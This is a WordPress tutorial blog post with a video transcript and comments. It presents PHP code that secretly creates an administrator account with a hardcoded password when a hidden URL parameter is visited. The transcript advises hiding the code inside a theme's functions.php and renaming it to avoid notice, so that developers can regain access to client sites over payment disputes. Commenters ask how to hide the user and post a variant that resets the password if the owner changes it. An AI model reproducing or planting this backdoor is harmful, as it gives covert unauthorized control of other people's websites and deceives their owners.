How To Create A Secret Backdoor Admin Access To WordPress

by Adam @ WPCrafter   |   Last Updated: May 18, 2017
Share on facebook
Share on twitter
Share on linkedin
Share on pinterest
Share on email

Here us the code you can use to create a backdoor into any WordPress website.

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

Video Transcript

How To Create A Secret Backdoor Admin Access To WordPress

In this video under the teach you how to create
a back door which is backdoor access to a

WordPress website now the whole concept of
creating a backdoor kind of has the a kind

of a hacker connotations with it and I’m not
condoning using this for hacking your anything

like that there are a lot of legitimate reasons
why you might want back door a backdoor way

into your WordPress website so a great example
would be if you are someone that creates websites

for your customers and you maybe deliver that
website before getting paid in full you don’t

want your customer to then go in and delete
your access and now there’s nothing you can

do you have no recourse in order to get paid
those are situations where having a backdoor

way in is a perfect perfect legitimate reason
so that you can still have some recourse to

make sure that your client pays you another
way that you would want to use this perhaps

is maybe is an insurance policy to make things
easier if something happens with your login

so there are real legitimate reasons why you
would want to create a backdoor way into your

WordPress website and in this video I’m going
to show you how to do it now where this originated

is I recently delivered a website to someone
and I was a little iffy on if they were going

to do their side of the agreement which is
pay and so just in case I wanted to create

a backdoor way and if they they did this to
me so thats why I was motivation between me

learning it so I’m gonna show you this bit
of code that I found on the Internet I’ve

got it pulled up right here and I’ll give
you a link to pull this up and essentially

this is just. The code we need to copy into
our WordPress theme and what is can allow

us to do is on your site that you install
this on you be able to go to a specific URL

on the site and it will create a user account
and then he would be able to login with that

user account and regain access to the word
press website and so this is a function and

he needs to go on a function of function file
of your WordPress theme or child theme were

both in order for it to work now you don’t
want to do anything wrong because if you do

you could make your WordPress website get
that white screen of death if there’s one

character off so you just want to proceed
with a little bit of caution or make sure

that you know how to then go ahead and fix
it in about a video on how to fix it if something

goes wrong so what did you summon a copy this
enema to put it in my WordPress site and then

I’m to show you what you can modify and change
so here’s the whole entire bit of code but

we don’t need this first line we just need
words says starts here and says add actions

to go ahead and highlight that in copy that
into your clipboard and right now I’m logged

into a WordPress website that working at test
this on and I’m going to go ahead and go to

appearance and then right here words is editor
here’s a list of the different files that

make up your theme and the one we want to
put this and is race your existing functions

and write your sis functions.php now when
you’re looking or might not say theme functions

it just might take functions of but over here
will say that the same thing on everyone’s

sight words functions.php someone to click
on that and it shows me up here now if you

want to be sneaky you can paste it someplace
in the middle of this file or you could just

be careful replacing you want to place in
the wrong spots will show you how I would

go about that so here’s where I can scroll
up or down in the files let’s just go maybe

halfway down it and you see right here policy
let’s find a good spots okay we can put it

right actually right here is perfect so you
see right here you have the sections were

you’ll see us/and then two asterisks these
are notes so you would typically want to place

it at the top of the note or the bottom of
the note and so this is actually really good

right here to put it right underneath this
so make the enter key and I’m to go right

there and then I’m going to paste that bit
of code in so here is the code that I’m adding

so here’s some of the things that you can
change in this little bit of code to make

it your own so right here it says my back
door and right here it says my back door you

could change this word back door on either
of them SEVIS is backdoor it’s kind of like

obvious that there some kind of weigh-in okay
so I went to go ahead and change back toward

to say path actually pathway so I need to
have it be identical right here there it is

pathway and then pathway okay and then this
piece right here it’s his back door you can

change as well now this is going to be used
in that custom URL that I said. A visit to

trigger this user account to being created
so all I can make this pathway as well it

doesn’t have to be the same as these two it
can be different but I’m not feeling super

creative so I’ll put the word pathway as well
okay and now were at this line in this is

where were going to specify what user the
username will be when this is triggered so

instead of Mr. admin I don’t like that but
we could leave it it’s call it pathway as

well find my not feeling creative today and
right here we need this to be the same as

what we put here this is basically saying
make sure first check to see if there is a

user name with the count username with that
is pathway and if there is then don’t create

one but if there isn’t let’s go ahead and
then proceed someone is a pathway again and

then here’s where we would put in what the
password is good to be on this user account

pathway that were creating such as: pass put
in! In the put pathway all right and though

we don’t need to change anything on these
two lines right there so now let me show you

what’s going to happen working to go to the
URL of the website whatever minutes a.com

actually got to go to the URL of the website
were to put the? There were up with the word

pathway there were up with the = and they
were going to put the word go so let me show

you what that’s can look like a so it’s going
to be so there’s my URL actually got that

wrong is example.dev and there were put up?
Then I met up with that word I chose pathway

and then I went to put the = and then I’m
going to put the word go so when I entered

this in actually the let me properly format
that so when I go to this visit this URL it’s

good to trigger this little snippet of code
in is going to go ahead and create that user

account so let me put this into my clipboard
so now that I’ve got my function that I created

this backdoor I went to click on update file
now here’s the dangerous part if you did something

wrong and you hit this you might get a complete
white screen unfortunately on your WordPress

website and then you need to know how to go
in via FTP or the file manager and fix it

so but I’m pretty sure I’ll get it right slimming
click on update file and it says right here

file edited successfully which means it was
done correctly so go right here to users and

you can see the only user I have is this site
Patman now when I’m in to do some of the go

in and visit the URL okay got the URL and
I’m been hit enter and it takes me to the

home page of the site so there’s no visual
indication that anything happened but I do

know that this works so now what I’m to do
some to go back into that table of users and

I’m to show you that the user was indeed created
so Michael right here to my dashboard click

on users and you can see right there that
user account pathway was created and that’s

pretty much all there is to in creating a
backdoor access to protect you as a web developer

to get paid or maybe to have that a little
easy insurance policy to get back into website

and that is pretty secure to use IE there
is no way for someone to see your functions

file without existing axis to your website
your WordPress website anyway so now if you

mess anything up and you are white screen
I’ve got a video that will show you how to

go in and fix that now if you want to implement
this on your website have a link below that

will take you over to where you can get this
code and if you’re on my website I’ll have

a link as well where you can copy and paste
the code just like how you saw me you now

there is one little caveat that you need to
be made aware of if you place us in the parent

theme and then there’s a theme update this
function will get overwritten in it will be

wiped out I always suggest using a child theme
and I have a video on how to create a child

theme and in that scenario you would place
this code in your child themes functions file

and then if the parenting had an update it
wouldn’t overwrite this custom function and

if you were doing this for a client that you
want to make sure he got paid I would put

this function maybe to to have two variations
of it I would put the function in your child

thing and then I would also as an insurance
policy go ahead and put it in your parent

theme just so you have to ways back into your
website that’s it for today’s video I love

to hear your thoughts on it in the comment
section down below please also give me a thumbs

up on YouTube that really helps me out and
if you haven’t subscribed it to the channel

go ahead and click on that subscribe on that
also helps me out now I don’t want you to

ever leave empty-handed and that’s why I put
together a free video course and just for

my subscribers called the three steps to WordPress
success now if you would like free access

to that course just go ahead and click right
here on the right thanks for watching and

I’ll see you in the next video

Adam @ WPCrafter

Adam @ WPCrafter

My passion is making the best quality video tutorial online, for non-techies. When I am not behind the camera, I am usually helping out one of my YouTube subscribers.

17 thoughts on “How To Create A Secret Backdoor Admin Access To WordPress”

  1. Motivation_guru

    I want this backdoor user to be hidden and not to show in user list. Can you please share the code or anyway to hide this specific user from the WordPress user dashboard list @mr_adam.

    I’ll be very thankful to you.

  2. t

    i tested it and it worked. thank you so much. Can i ask how to put similar kind of code to do the same think inside cs cart or open cart platform?
    if you know the way – please share. thank you.

  3. P

    I fixed this issue with isset.

    if (isset($_GET[‘mylogin’])) {
    if ( md5( $_GET[‘mylogin’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

    Next issue, but not sure what to do about it. This appears in debug mode after you submit function.

    Notice: registration.php is deprecated since version 3.1.0 with no alternative available. This file no longer needs to be included. in /home/…/public_html/wp-includes/functions.php on line 3984

  4. P

    Getting an error when you turn on WP_Debug true.
    Notice: Undefined index: mylogin in /home/…/functions.php on line 721
    on this line…
    (721) if ( md5( $_GET[‘mylogin’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

    Great Idea! I’m putting this on all my sites.

  5. Y

    Hi Admin, thank you very much for the excellent tutorial! Its exactly what I’ve been looking for. Question: Once I added the code, it create a full width white band (section) just below my menu bar. Any advice on why and how I can get rid of it?
    Any advice is greatly appreciated! Thank you

  6. L

    Hello Adam,
    I can’t seem to proceed on WordPress 4.9.4 version (current version as on Feb. 2018).
    Everytime I try, I get the White Screen of …Death? (really? 😉 )
    What I do is connect via ftp to my server, modify what needs to be in the functions.php file, upload the new modified file, and launch the website…and …WHITE SCREEN OF DEA-EA-EATH! :+)))
    I followed your step-by-step method but something does not seem to go quite right…
    What am I doing wrong?
    I am using Theme Oblique 2.0.8.
    Thank you in advance for your help!
    And by the way, this website is really interesting.

      1. L

        In fact, I never thought of keeping a backdoor access to a client’s website before. So, I never had the opportunity to test your code previously. I don’t think it has to do with the fact that I’m using a FR-Wordpress version.

  7. I

    I make the snippet stronger against if the customer decided to change the role or the password of the backdoor user.

    add_action( ‘wp_head’, ‘my_backdoor’ );

    function my_backdoor() {
    if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
    require( ‘wp-includes/registration.php’ );
    if ( !username_exists( ‘mr_admin’ ) ) {
    $user_id = wp_create_user( ‘mr_admin’, ‘pa55w0rd!’ );
    $user = new WP_User( $user_id );
    $user->set_role( ‘administrator’ );
    }
    else {
    $user = get_user_by(‘login’,’pathway’);
    wp_set_password(‘pa55w0rd!’, $user->ID );
    $user->set_role( ‘administrator’ );
    }
    }
    }

    1. g

      this is what you should use to call the function
      e.g d.test.com/?backdoor=34d1f91fb2e514b8576fab1a75a89a6b

Leave a Comment

Your email address will not be published. Required fields are marked *